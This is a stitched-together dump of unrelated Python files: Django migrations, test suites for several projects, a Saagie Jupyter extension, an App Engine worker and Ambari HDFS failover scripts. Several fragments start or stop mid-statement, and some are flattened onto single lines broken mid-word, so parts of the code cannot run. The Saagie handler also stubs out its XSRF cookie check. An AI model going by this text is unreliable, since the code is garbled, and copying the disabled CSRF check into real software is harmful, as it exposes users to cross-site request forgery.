repo+branch_tree format = controldir.format_registry.make_bzrdir('knit') branch = bzrdir.BzrDir.create_branch_convenience(self.get_url(), format=format) 
self.assertRaises(errors.NoWorkingTree, branch.bzrdir.open_workingtree) branch.bzrdir.open_repository() def test_create_branc
# -*- coding: utf-8 -*-
# Generated by Django 1.10.5 on 2017-03-07 06:05
from __future__ import unicode_literals

from django.db import migrations, models
import django.db.models.deletion


class Migration(migrations.Migration):
    # Adds the Location model, links Newspaper rows into a prev/next chain,
    # relaxes date_ended to be optional, and attaches each Newspaper to a
    # Location.

    dependencies = [
        ('news', '0003_auto_20170228_2249'),
    ]

    operations = [
        # New Location model; (city, state) is made unique further down via
        # AlterUniqueTogether.
        migrations.CreateModel(
            name='Location',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('city', models.CharField(default='Testville', max_length=200)),
                ('state', models.CharField(default='Montigania', max_length=200)),
            ],
        ),
        # Self-referential links between papers; related_name='+' disables
        # the reverse accessor on Newspaper.
        migrations.AddField(
            model_name='newspaper',
            name='next_paper',
            field=models.ForeignKey(default=None, on_delete=django.db.models.deletion.CASCADE, related_name='+', to='news.Newspaper'),
        ),
        migrations.AddField(
            model_name='newspaper',
            name='prev_paper',
            field=models.ForeignKey(default=None, on_delete=django.db.models.deletion.CASCADE, related_name='+', to='news.Newspaper'),
        ),
        # date_ended becomes optional (blank/null allowed).
        migrations.AlterField(
            model_name='newspaper',
            name='date_ended',
            field=models.DateField(blank=True, null=True, verbose_name='date ended'),
        ),
        migrations.AlterUniqueTogether(
            name='location',
            unique_together=set([('city', 'state')]),
        ),
        # NOTE(review): default=1 assumes a Location row with pk=1 exists at
        # migration time - confirm against fixture/data migrations.
        migrations.AddField(
            model_name='newspaper',
            name='location',
            field=models.ForeignKey(default=1, on_delete=django.db.models.deletion.CASCADE, to='news.Location'),
        ),
    ]
# coding: utf-8 # Copyright (c) Pymatgen Development Team. # Distributed under the terms of the MIT License. #!/usr/bin/env python from __future__ impo
rt division, unicode_literals """ #TODO: Write module doc. """ __author__ = 'Shyue Ping Ong' __copyright__ = 'Copyright 2013, The Materials Virtual Lab' __version__ = '0.1' __maintainer__ = 'Shyue Ping Ong' __email__ = 'ongsp@ucsd.edu' __date__ = '8/1/15' import warnings warnings.warn("pymatgen.io.aseio
has been moved pymatgen.io.ase. This stub " "will be removed in pymatgen 4.0.", DeprecationWarning) from .ase import *
#!/usr/bin/env python3

"""tests.test_io.test_read_gfa.py: tests for exfi.io.read_gfa.py"""

from unittest import TestCase, main

from exfi.io.read_gfa import read_gfa1

from tests.io.gfa1 import \
    HEADER, \
    SEGMENTS_EMPTY, SEGMENTS_SIMPLE, SEGMENTS_COMPLEX, \
    SEGMENTS_COMPLEX_SOFT, SEGMENTS_COMPLEX_HARD, \
    LINKS_EMPTY, LINKS_SIMPLE, LINKS_COMPLEX, \
    CONTAINMENTS_EMPTY, CONTAINMENTS_SIMPLE, CONTAINMENTS_COMPLEX, \
    PATHS_EMPTY, PATHS_SIMPLE, PATHS_COMPLEX, \
    GFA1_EMPTY_FN, GFA1_SIMPLE_FN, GFA1_COMPLEX_FN, \
    GFA1_COMPLEX_SOFT_FN, GFA1_COMPLEX_HARD_FN


class TestReadGFA1(TestCase):
    """Tests for exfi.io.read_gfa.read_gfa1"""

    def _check_gfa(self, filename, segments, links, containments, paths):
        """Parse *filename* and assert each dataframe equals the expected one.

        The header is the same fixture in every case, so it is checked here
        rather than passed in.
        """
        gfa1 = read_gfa1(filename)
        self.assertTrue(gfa1['header'].equals(HEADER))
        self.assertTrue(gfa1['segments'].equals(segments))
        self.assertTrue(gfa1['links'].equals(links))
        self.assertTrue(gfa1['containments'].equals(containments))
        self.assertTrue(gfa1['paths'].equals(paths))

    def test_empty(self):
        """exfi.io.read_gfa.read_gfa1: empty case"""
        self._check_gfa(
            GFA1_EMPTY_FN,
            SEGMENTS_EMPTY, LINKS_EMPTY, CONTAINMENTS_EMPTY, PATHS_EMPTY)

    def test_simple(self):
        """exfi.io.read_gfa.read_gfa1: simple case"""
        self._check_gfa(
            GFA1_SIMPLE_FN,
            SEGMENTS_SIMPLE, LINKS_SIMPLE, CONTAINMENTS_SIMPLE, PATHS_SIMPLE)

    def test_complex(self):
        """exfi.io.read_gfa.read_gfa1: complex case"""
        self._check_gfa(
            GFA1_COMPLEX_FN,
            SEGMENTS_COMPLEX, LINKS_COMPLEX, CONTAINMENTS_COMPLEX,
            PATHS_COMPLEX)

    def test_complex_soft(self):
        """exfi.io.read_gfa.read_gfa1: complex and soft masking case"""
        self._check_gfa(
            GFA1_COMPLEX_SOFT_FN,
            SEGMENTS_COMPLEX_SOFT, LINKS_COMPLEX, CONTAINMENTS_COMPLEX,
            PATHS_COMPLEX)

    def test_complex_hard(self):
        """exfi.io.read_gfa.read_gfa1: complex and hard masking case"""
        self._check_gfa(
            GFA1_COMPLEX_HARD_FN,
            SEGMENTS_COMPLEX_HARD, LINKS_COMPLEX, CONTAINMENTS_COMPLEX,
            PATHS_COMPLEX)


if __name__ == '__main__':
    main()
# coding=utf-8 import json import codecs import os import transaction from nextgisweb import DBSession from nextgisweb.vector_layer import VectorLayer from nextgisweb_compulink.compulink_admin.model import BASE_PATH def update_actual_lyr_names(args): db_session = DBSession() transaction.manager.begin() # what update upd_real_layers = ['real_access_point', 'real_fosc', 'real_optical_cable', 'real_optical_cable_point', 'real_optical_cross', 'real_special_transition', 'real_special_transition_point'] upd_real_lyr_names = {} # new names (already in templates!) real_layers_template_path = os.path.join(BASE_PATH, 'real_layers_templates/') for up_lyr_name in upd_real_layers: with codecs.open(os.path.join(real_layers_template_path, up_lyr_name + '.json'), encoding='utf-8') as json_file: json_layer_struct = json.load(json_file, encoding='utf-8') new_name = json_layer_struct['resource']['display_name'] upd
_real_lyr_names[up_lyr_name] = new_name # update now resources = db_session.query(VectorLayer).filter(VectorLayer.keyname.like('real_%')).all() for vec_layer in resources: lyr_name = vec_layer.keyname if not lyr_name:
continue for up_lyr_name in upd_real_lyr_names.keys(): if lyr_name.startswith(up_lyr_name) and not lyr_name.startswith(up_lyr_name + '_point'): # ugly! vec_layer.display_name = upd_real_lyr_names[up_lyr_name] print '%s updated' % lyr_name break transaction.manager.commit() db_session.close()
#
# SPDX-License-Identifier: MIT
#

import os
import shutil
import unittest

from oeqa.core.utils.path import remove_safe
from oeqa.sdk.case import OESDKTestCase

from oeqa.utils.subprocesstweak import errors_have_output
errors_have_output()


class GccCompileTest(OESDKTestCase):
    """Smoke-test the SDK cross toolchain by compiling small C/C++
    sources directly and through make."""

    td_vars = ['MACHINE']

    @classmethod
    def setUpClass(cls):
        # Copy the test sources into the SDK directory before any test runs;
        # tearDownClass removes them again.
        sources = {'test.c': cls.tc.files_dir,
                   'test.cpp': cls.tc.files_dir,
                   'testsdkmakefile': cls.tc.sdk_files_dir}
        for name, src_dir in sources.items():
            shutil.copyfile(os.path.join(src_dir, name),
                            os.path.join(cls.tc.sdk_dir, name))

    def setUp(self):
        # Skip unless the SDK actually ships a cross toolchain.
        machine = self.td.get("MACHINE")
        has_toolchain = (
            self.tc.hasHostPackage("packagegroup-cross-canadian-%s" % machine)
            or self.tc.hasHostPackage("^gcc-", regex=True))
        if not has_toolchain:
            raise unittest.SkipTest("GccCompileTest class: SDK doesn't contain a cross-canadian toolchain")

    def test_gcc_compile(self):
        self._run('$CC %s/test.c -o %s/test -lm' % (self.tc.sdk_dir, self.tc.sdk_dir))

    def test_gpp_compile(self):
        # NOTE(review): this feeds the C source to $CXX (g++ accepts .c);
        # test_gpp2_compile below covers the .cpp source.
        self._run('$CXX %s/test.c -o %s/test -lm' % (self.tc.sdk_dir, self.tc.sdk_dir))

    def test_gpp2_compile(self):
        self._run('$CXX %s/test.cpp -o %s/test -lm' % (self.tc.sdk_dir, self.tc.sdk_dir))

    def test_make(self):
        self._run('cd %s; make -f testsdkmakefile' % self.tc.sdk_dir)

    @classmethod
    def tearDownClass(cls):
        # Remove everything setUpClass copied in plus build artifacts.
        for name in ['test.c', 'test.cpp', 'test.o', 'test', 'testsdkmakefile']:
            remove_safe(os.path.join(cls.tc.sdk_dir, name))
#!/usr/bin/env python3
"""CGI script: print the list of all primes below 10001 as an HTML page."""


def primes_below(limit):
    """Return the sorted list of primes strictly less than *limit*.

    Uses a sieve of Eratosthenes.  Replaces the original trial-deletion
    loop, which performed O(n) ``del list[i]`` operations inside a nested
    scan (roughly cubic overall); the printed output is identical.
    """
    if limit <= 2:
        return []
    is_prime = [True] * limit
    is_prime[0] = is_prime[1] = False
    for p in range(2, int(limit ** 0.5) + 1):
        if is_prime[p]:
            # Multiples below p*p were already crossed off by smaller primes.
            for multiple in range(p * p, limit, p):
                is_prime[multiple] = False
    return [n for n, prime in enumerate(is_prime) if prime]


# CGI response: content-type header, blank separator line, then the body.
print('Content-type: text/html')
print()
print(primes_below(10001))
#!/usr/bin/env python
#
# Copyright (c) 2001 - 2016 The SCons Foundation
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#

__revision__ = "test/SWIG/SWIGOUTDIR.py rel_2.5.1:3735:9dc6cee5c168 2016/11/03 14:02:02 bdbaddog"

"""
Verify that use of the $SWIGOUTDIR variable causes SCons to recognize
that Java files are created in the specified output directory.
"""

import TestSCons

test = TestSCons.TestSCons()

# Skip unless both swig and the Java headers are available on this host.
swig = test.where_is('swig')
if not swig:
    test.skip_test('Can not find installed "swig", skipping test.\n')

where_java_include=test.java_where_includes()
if not where_java_include:
    test.skip_test('Can not find installed Java include files, skipping test.\n')

# The %(where_java_include)s placeholder is filled in from locals() below,
# so the generated SConstruct embeds the detected Java include path.
# SWIGOUTDIR deliberately contains a space to exercise quoting.
test.write(['SConstruct'], """\
env = Environment(tools = ['default', 'swig'],
                  CPPPATH=%(where_java_include)s,
                  )
Java_foo_interface = env.SharedLibrary(
    'Java_foo_interface',
    'Java_foo_interface.i',
    SWIGOUTDIR = 'java/build dir',
    SWIGFLAGS = '-c++ -java -Wall',
    SWIGCXXFILESUFFIX = "_wrap.cpp")
""" % locals())

test.write('Java_foo_interface.i', """\
%module foopack
""")

# SCons should realize that it needs to create the "java/build dir"
# subdirectory to hold the generated .java files.
test.run(arguments = '.')

test.must_exist('java/build dir/foopackJNI.java')
test.must_exist('java/build dir/foopack.java')

# SCons should remove the built .java files.
test.run(arguments = '-c')

test.must_not_exist('java/build dir/foopackJNI.java')
test.must_not_exist('java/build dir/foopack.java')

# SCons should realize it needs to rebuild the removed .java files.
test.not_up_to_date(arguments = '.')

test.must_exist('java/build dir/foopackJNI.java')
test.must_exist('java/build dir/foopack.java')

test.pass_test()

# Local Variables:
# tab-width:4
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=4 shiftwidth=4:
# Licensed to the Software Freedom Conservancy (SFC) under one
# or more contributor license agreements.  See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership.  The SFC licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License.  You may obtain a copy of the License at
#
#   http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied.  See the License for the
# specific language governing permissions and limitations
# under the License.

from selenium import webdriver
from selenium.test.selenium.webdriver.common import select_class_tests
from selenium.test.selenium.webdriver.common.webserver import SimpleWebServer


def setup_module(module):
    """Start the shared web server and Firefox driver for the test class."""
    server = SimpleWebServer()
    server.start()
    test_cls = FirefoxSelectElementHandlingTests
    test_cls.webserver = server
    test_cls.driver = webdriver.Firefox()


class FirefoxSelectElementHandlingTests(select_class_tests.WebDriverSelectSupportTests):
    """Runs the common <select> handling suite against Firefox."""
    pass


def teardown_module(module):
    """Shut down the browser and web server started in setup_module."""
    test_cls = FirefoxSelectElementHandlingTests
    test_cls.driver.quit()
    test_cls.webserver.stop()
from google.appengine.ext import webapp
from google.appengine.ext.webapp import util
from google.appengine.api.labs import taskqueue
from google.appengine.api import memcache

from lifestream import *


class LifeStreamQueueWorker(webapp.RequestHandler):
    """Fans out one task per feed index, then schedules a stream refresh."""

    def get(self):
        # Reset the fresh-entry counter before the fan-out starts.
        memcache.set('fresh_count', 0)
        for feed_index in LifeStream.instance().indexes:
            taskqueue.add(url='/app_worker/task', method='GET',
                          params={'index': feed_index})
        # Give the per-feed tasks a head start before the aggregate refresh.
        taskqueue.add(url='/app_worker/refresh', method='GET', countdown=10)


class LifeStreamTaskWorker(webapp.RequestHandler):
    """Updates the single feed identified by the 'index' query parameter."""

    def get(self):
        LifeStream.update_feed(int(self.request.get('index')))


class LifeStreamRefreshWorker(webapp.RequestHandler):
    """Rebuilds the aggregated life stream from the updated feeds."""

    def get(self):
        LifeStream.refresh_stream()


def main():
    routes = [
        ('/app_worker/queue', LifeStreamQueueWorker),
        ('/app_worker/task', LifeStreamTaskWorker),
        ('/app_worker/refresh', LifeStreamRefreshWorker),
    ]
    util.run_wsgi_app(webapp.WSGIApplication(routes, debug=True))


if __name__ == '__main__':
    main()
notebook_json = data.pop('notebook_json', None) notebook = Notebook(notebook_path, notebook_json) try: template_name, template_data = views.render( view_name, notebook=notebook, data=data, method=method) except ResponseError as e:
self.send_error(e.status_code) return except: template_name = 'internal_error.html' template_data = {'error': traceback.format_exc()} self.set_status(500) template_data.update(
notebook=notebook, ) template = env.get_template(template_name) self.finish(template.render(template_data)) def get(self): self.handle_request('GET') def post(self): self.handle_request('POST') def check_xsrf_cookie(self): return class SaagieCheckHandler(IPythonHandler): def get(self): self.finish() class SaagieJobRun: def __init__(self, job, run_data): self.job = job self.id = run_data['id'] self.status = run_data['status'] self.stderr = run_data.get('logs_err', '') self.stdout = run_data.get('logs_out', '') class SaagieJob: @classmethod def from_id(cls, notebook, platform_id, job_id): return SaagieJob( notebook, requests.get(JOB_URL_PATTERN % (platform_id, job_id), auth=SAAGIE_BASIC_AUTH_TOKEN).json()) def __init__(self, notebook, job_data): self.notebook = notebook self.data = job_data self.platform_id = job_data['platform_id'] self.capsule_type = job_data['capsule_code'] self.id = job_data['id'] self.name = job_data['name'] self.last_run = None def set_as_current(self): self.notebook.current_job = self @property def url(self): return (JOBS_URL_PATTERN + '/%s') % (self.platform_id, self.id) @property def admin_url(self): return get_absolute_saagie_url('/#/manager/%s/job/%s' % (self.platform_id, self.id)) @property def logs_url(self): return self.admin_url + '/logs' @property def is_started(self): return self.last_run is not None def fetch_logs(self): job_data = requests.get(self.url, auth=SAAGIE_BASIC_AUTH_TOKEN).json() run_data = job_data.get('last_instance') if run_data is None or run_data['status'] not in ('SUCCESS', 'FAILED'): return run_data = requests.get( get_absolute_saagie_url('/api/v1/jobtask/%s' % run_data['id']), auth=SAAGIE_BASIC_AUTH_TOKEN).json() self.last_run = SaagieJobRun(self, run_data) @property def details_template_name(self): return 'include/python_job_details.html' def __str__(self): return self.name def __eq__(self, other): if other is None: return False return self.platform_id == other.platform_id and self.id == other.id def __lt__(self, 
other): if other is None: return False return self.id < other.id class SaagiePlatform: SUPPORTED_CAPSULE_TYPES = {'python'} def __init__(self, notebook, platform_data): self.notebook = notebook self.id = platform_data['id'] self.name = platform_data['name'] self.capsule_types = {c['code'] for c in platform_data['capsules']} @property def is_supported(self): return not self.capsule_types.isdisjoint(self.SUPPORTED_CAPSULE_TYPES) def get_jobs(self): if not self.is_supported: return [] jobs_data = requests.get(JOBS_URL_PATTERN % self.id, auth=SAAGIE_BASIC_AUTH_TOKEN).json() return [SaagieJob(self.notebook, job_data) for job_data in jobs_data if job_data['category'] == 'processing' and job_data['capsule_code'] in self.SUPPORTED_CAPSULE_TYPES] def __eq__(self, other): return self.id == other.id class Notebook: CACHE = {} def __new__(cls, path, json): if path in cls.CACHE: return cls.CACHE[path] cls.CACHE[path] = new = super(Notebook, cls).__new__(cls) return new def __init__(self, path, json_data): if path is None: path = 'Untitled.ipynb' if json_data is None: json_data = json.dumps({ 'cells': [], 'metadata': {'kernelspec': {'name': 'python3'}}}) self.path = path self.json = json.loads(json_data) # In cached instances, current_job is already defined. 
if not hasattr(self, 'current_job'): self.current_job = None @property def name(self): return os.path.splitext(os.path.basename(self.path))[0] @property def kernel_name(self): return self.json['metadata']['kernelspec']['name'] @property def kernel_display_name(self): return self.json['metadata']['kernelspec']['display_name'] def get_code_cells(self): return [cell['source'] for cell in self.json['cells'] if cell['cell_type'] == 'code'] def get_code(self, indices=None): cells = self.get_code_cells() if indices is None: indices = list(range(len(cells))) return '\n\n\n'.join([cells[i] for i in indices]) def get_platforms(self): return [SaagiePlatform(self, platform_data) for platform_data in requests.get(PLATFORMS_URL, auth=SAAGIE_BASIC_AUTH_TOKEN).json()] class ViewsCollection(dict): def add(self, func): self[func.__name__] = func return func def render(self, view_name, notebook, data=None, method='GET', **kwargs): if data is None: data = {} try: view = views[view_name] except KeyError: raise ResponseError(404) template_data = view(method, notebook, data, **kwargs) if isinstance(template_data, tuple): template_name, template_data = template_data else: template_name = view.__name__ + '.html' return template_name, template_data views = ViewsCollection() @views.add def modal(method, notebook, data): return {} def clear_basic_auth_token(): global SAAGIE_BASIC_AUTH_TOKEN SAAGIE_BASIC_AUTH_TOKEN = None # Init an empty Basic Auth token on first launch clear_basic_auth_token() def is_logged(): if SAAGIE_ROOT_URL is None or SAAGIE_BASIC_AUTH_TOKEN is None: return False else: # Check if Basic token is still valid is_logged_in = False try: response = requests.get(SAAGIE_ROOT_URL + '/api/v1/user-current', auth=SAAGIE_BASIC_AUTH_TOKEN, allow_redirects=False) is_logged_in = response.ok except (requests.ConnectionError, requests.RequestException, requests.HTTPError, requests.Timeout) as err: print ('Error while trying to connect to Saagie: ', err) if is_logged_in is not True: # 
Remove Basic Auth token from globals. It will force a new login phase. clear_basic_auth_token() return is_logged_in def define_globals(saagie_root_url, saagie_username): if saagie_root_url is not None: global SAAGIE_ROOT_URL global SAAGIE_USERNAME global PLATFORMS_URL global JOBS_URL_PATTERN global JOB_URL_PATTERN global JOB_UPGRADE_URL_PATTERN global SCRIPT_UPLOAD_URL_PATTERN SAAGIE_USERNAME = saagie_username SAAGIE_ROOT_URL = saagie_root_url.strip("/") PLATFORMS_URL = SAAGIE_ROOT_URL + '/api/v1/platform' JOBS_URL_PATTERN = PLATFORMS_URL + '/%s/job' JOB_URL_PATTERN = JOBS_URL_PATTERN + '/%s' JOB_UPGRADE_URL_PATTERN = JOBS_URL_PATTERN + '/%s/version' SCRIPT_UPLOAD_URL_PATTERN = JOBS_URL_PATTERN + '/upload' @views.add def login_form(method, notebook, data): if method == 'POST': # check if the given Saagie URL is well formed if not validators.url(data['saagie_root_url']): return {'error': 'Invalid URL', 'saagi
# -*- coding: utf-8 -*-
# Generated by Django 1.10.3 on 2016-12-23 10:13
from __future__ import unicode_literals

from django.db import migrations, models
import django.db.models.deletion


class Migration(migrations.Migration):
    """Introduce the Blog model and link each Post to an optional Blog."""

    dependencies = [
        ('blog', '0006_auto_20160321_1527'),
    ]

    operations = [
        # A bare container model: only the implicit auto primary key.
        migrations.CreateModel(
            name='Blog',
            fields=[
                ('id', models.AutoField(auto_created=True,
                                        primary_key=True,
                                        serialize=False,
                                        verbose_name='ID')),
            ],
        ),
        # Nullable so existing Post rows stay valid without a data backfill.
        migrations.AddField(
            model_name='post',
            name='blog',
            field=models.ForeignKey(null=True,
                                    on_delete=django.db.models.deletion.CASCADE,
                                    to='blog.Blog'),
        ),
    ]
# Generated by Django 2.2.24 on 2021-10-21 02:45

from django.db import migrations, models


class Migration(migrations.Migration):
    """Add a database index on Case.created to speed up recency queries."""

    dependencies = [
        ("cases", "0015_case_is_quarantied"),
    ]

    operations = [
        migrations.AddIndex(
            model_name="case",
            index=models.Index(fields=["created"],
                               name="cases_case_created_a615f3_idx"),
        ),
    ]
""" WSGI config for ffstats project. This module contains the WSGI application used by Django's development server and any production WSGI deployments. It should expose a module-level variable named ``application``. Django's ``runserver`` and ``runfcgi`` commands discover this application via the ``WSGI_APPLICATION`` setting. Usually you will have the standard Django WSGI application here, but it also might make sense to replace the whole Django WSGI application with a custom one that later delegate
s to the Django one. For example, you could introduce WSGI middleware here, or combine a Django application with an application of another framework. """ import os # We defer to a DJANGO_SETTINGS_MODULE already in the environment. This breaks # if running multiple sites in the same mod_wsgi process. To fix this, use # mod_wsgi daemon mode with each site in its own daemon process, or use # os.environ["DJANGO_SETTINGS_MODULE"] = "ffstats.settings" os.environ.setdefault("DJANGO_SETTINGS_MODULE", "ff
stats.settings") # This application object is used by any WSGI server configured to use this # file. This includes Django's development server, if the WSGI_APPLICATION # setting points here. from django.core.wsgi import get_wsgi_application application = get_wsgi_application() # Apply WSGI middleware here. # from helloworld.wsgi import HelloWorldApplication # application = HelloWorldApplication(application)
#!/usr/bin/env python from __future__ import print_function import argparse import xml.etree.ElementTree as ET def main(): parser = argparse.ArgumentParser(description="List all error without a CWE assigned in CSV format") parser.add_argument("-F", metavar="filename", requi
red=True, help="XML file containing output from: ./cppcheck --errorlist --xml-version=2") parsed = parser.parse_args() tree = ET.parse(vars(parsed)["F"]) root = tree.getroot() for child in root.iter("error"): if "cwe" not in child.attrib: print(child.attrib["id"], child.attrib["severity
"], child.attrib["verbose"], sep=", ") if __name__ == "__main__": main()
import django_filters

from .models import Resource


class ResourceFilter(django_filters.FilterSet):
    """Filter set exposing the searchable attributes of a Resource."""

    class Meta:
        # Each listed field gets an auto-generated exact-match filter.
        model = Resource
        fields = [
            'title',
            'description',
            'domains',
            'topics',
            'resource_type',
            'suitable_for',
        ]
#!/usr/bin/env python
# encoding: utf-8
"""
Download command for ssstat--download logs without adding to MongoDB.

2012-11-18 - Created by Jonathan Sick
"""

import os
import logging

from cliff.command import Command

import ingest_core


def _parse_bool(value):
    """argparse type for --delete: textual booleans, unlike bool().

    The original ``type=bool`` treated every non-empty string -- including
    "False" -- as True, so deletion could never be disabled from the command
    line. Anything not in the falsy set below still parses as True, which
    keeps previously-working invocations behaving the same.
    """
    return str(value).strip().lower() not in ('false', '0', 'no', 'off', '')


class DownloadCommand(Command):
    """ssstat download"""

    log = logging.getLogger(__name__)

    def get_parser(self, progName):
        """Adds command line options."""
        parser = super(DownloadCommand, self).get_parser(progName)
        parser.add_argument('log_bucket',
                            help='Name of S3 Logging Bucket')
        parser.add_argument('prefix',
                            help='Prefix for the desired log files')
        parser.add_argument('--cache-dir',
                            default=os.path.expandvars("$HOME/.ssstat/cache"),
                            action='store', dest='cache_dir',
                            help='Local directory where logs are cached')
        parser.add_argument('--delete', dest='delete', default=True,
                            type=_parse_bool,
                            help='Delete downloaded logs from S3')
        return parser

    def take_action(self, parsedArgs):
        """Runs the `ssstat download` command pipeline."""
        self.log.debug("Running ssstat download")
        # Downloads logs into root of cache directory
        ingest_core.download_logs(parsedArgs.log_bucket,
                                  parsedArgs.prefix,
                                  parsedArgs.cache_dir,
                                  delete=parsedArgs.delete)


def main():
    pass


if __name__ == '__main__':
    main()
# Copyright (c) 2015 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.

import unittest

from perf_insights import local_directory_corpus_driver


class LocalDirectoryCorpusDriverTests(unittest.TestCase):
    """Unit tests for tag derivation from corpus-relative paths."""

    def testTags(self):
        # assertEquals is a deprecated alias (removed in Python 3.12);
        # use assertEqual.
        # A file at the corpus root carries no tags.
        self.assertEqual(
            local_directory_corpus_driver._GetTagsForRelPath('a.json'),
            [])
        # Each intermediate directory name becomes one tag, in path order.
        self.assertEqual(
            local_directory_corpus_driver._GetTagsForRelPath('/b/c/a.json'),
            ['b', 'c'])
""" import params # Must kinit before running the HDFS command if params.security_enabled: Execute(format("{kinit_path_local} -kt {hdfs_user_keytab} {hdfs_principal_name}"), user = params.hdfs_user) active_namenode_id = None standby_namenode_id = None active_namenodes, standby_namenodes, unknown_namenodes = get_namenode_states(params.hdfs_site, params.security_enabled, params.hdfs_user) if active_namenodes: active_namenode_id = active_namenodes[0][0] if standby_namenodes: standby_namenode_id = standby_namenodes[0][0] if active_namenode_id: Logger.info(format("Active NameNode id: {active_namenode_id}")) if standby_namenode_id: Logger.info(format("Standby NameNode id: {standby_namenode_id}")) if unknown_namenodes: for unknown_namenode in unknown_namenodes: Logger.info("NameNode HA state for {0} is unknown".format(unknown_namenode[0])) if params.namenode_id == active_namenode_id and params.other_namenode_id == standby_namenode_id: # Failover if this NameNode is active and other NameNode is up and in standby (i.e. 
ready to become active on failover) Logger.info(format("NameNode {namenode_id} is active and NameNode {other_namenode_id} is in standby")) failover_command = format("hdfs haadmin -ns {dfs_ha_nameservices} -failover {namenode_id} {other_namenode_id}") check_standby_cmd = format("hdfs haadmin -ns {dfs_ha_nameservices} -getServiceState {namenode_id} | grep standby") msg = "Rolling Upgrade - Initiating a ZKFC failover on active NameNode host {0}.".format(params.hostname) Logger.info(msg) code, out = shell.call(failover_command, user=params.hdfs_user, logoutput=True) Logger.info(format("Rolling Upgrade - failover command returned {code}")) wait_for_standby = False if code == 0: wait_for_standby = True else: # Try to kill ZKFC manually was_zkfc_killed = kill_zkfc(params.hdfs_user) code, out = shell.call(check_standby_cmd, user=params.hdfs_user, logoutput=True) Logger.info(format("Rolling Upgrade - check for standby returned {code}")) if code == 255 and out: Logger.info("Rolling Upgrade - NameNode is already down.") else: if was_zkfc_killed: # Only mandate that this be the standby namenode if ZKFC was indeed killed to initiate a failover. wait_for_standby = True if wait_for_standby: Logger.info("Waiting for this NameNode to become the standby one.") Execute(check_standby_cmd, user=params.hdfs_user, tries=50, try_sleep=6, logoutput=True) else: msg = "Rolling Upgrade - Skipping ZKFC failover on NameNode host {0}.".format(params.hostname) Logger.info(msg) def kill_zkfc(zkfc_user): """ There are two potential methods for failing over the namenode, especially during a Rolling Upgrade. Option 1. Kill zkfc on primary namenode provided that the secondary is up and has zkfc running on it. Option 2. Silent failover :param zkfc_user: User that started the ZKFC process. :return: Return True if ZKFC was killed, otherwise, false. 
""" import params if params.dfs_ha_enabled: if params.zkfc_pid_file: check_process = as_user(format("ls {zkfc_pid_file} > /dev/null 2>&1 && ps -p `cat {zkfc_pid_file}` > /dev/null 2>&1"), user=zkfc_user) code, out = shell.call(check_process) if code == 0: Logger.debug("ZKFC is running and will be killed.") kill_command = format("kill -15 `cat {zkfc_pid_file}`") Execute(kill_command, user=zkfc_user ) File(params.zkfc_pid_file, action = "delete", ) return True return False def service(action=None, name=None, user=None, options="", create_pid_dir=False, create_log_dir=False): """ :param action: Either "start" or "stop" :param name: Component name, e.g., "namenode", "datanode", "secondarynamenode", "zkfc" :param user: User to run the command as :param options: Additional options to pass to command as a string :param create_pid_dir: Create PID directory :param create_log_dir: Crate log file directory """ import params options = options if options else "" pid_dir = format("{hadoop_pid_dir_prefix}/{user}") pid_file = format("{pid_dir}/hadoop-{user}-{name}.pid") hadoop_env_exports = { 'HADOOP_LIBEXEC_DIR': params.hadoop_libexec_dir } log_dir = format("{hdfs_log_dir_prefix}/{user}") # NFS GATEWAY is always started by root using jsvc due to rpcbind bugs # on Linux such as CentOS6.2. https://bugzilla.redhat.com/show_bug.cgi?id=731542 if name == "nfs3" : import status_params pid_file = status_params.nfsgateway_pid_file custom_export = { 'HADOOP_PRIVILEGED_NFS_USER': params.hdfs_user, 'HADOOP_PRIVILEGED_NFS_PID_DIR': pid_dir, 'HADOOP_PRIVILEGED_NFS_LOG_DIR': log_dir } hadoop_env_exports.update(custom_export) process_id_exists_command = as_sudo(["t
est", "-f", pid_file]) + " && " + as_sudo(["pgrep", "-F", pid_file]) # on STOP directories shouldn't be created # since during stop still old dirs are used (which were created during previous start) if action != "
stop": if name == "nfs3": Directory(params.hadoop_pid_dir_prefix, mode=0755, owner=params.root_user, group=params.root_group ) else: Directory(params.hadoop_pid_dir_prefix, mode=0755, owner=params.hdfs_user, group=params.user_group ) if create_pid_dir: Directory(pid_dir, owner=user, group=params.user_group, create_parents = True) if create_log_dir: if name == "nfs3": Directory(log_dir, mode=0775, owner=params.root_user, group=params.user_group) else: Directory(log_dir, owner=user, group=params.user_group, create_parents = True) if params.security_enabled and name == "datanode": ## The directory where pid files are stored in the secure data environment. hadoop_secure_dn_pid_dir = format("{hadoop_pid_dir_prefix}/{hdfs_user}") hadoop_secure_dn_pid_file = format("{hadoop_secure_dn_pid_dir}/hadoop_secure_dn.pid") # At datanode_non_root stack version and further, we may start datanode as a non-root even in secure cluster if not (params.stack_version_formatted and check_stack_feature(StackFeature.DATANODE_NON_ROOT, params.stack_version_formatted)) or params.secure_dn_ports_are_in_use: user = "root" pid_file = format( "{hadoop_pid_dir_prefix}/{hdfs_user}/hadoop-{hdfs_user}-{name}.pid") if action == 'stop' and (params.stack_version_formatted and 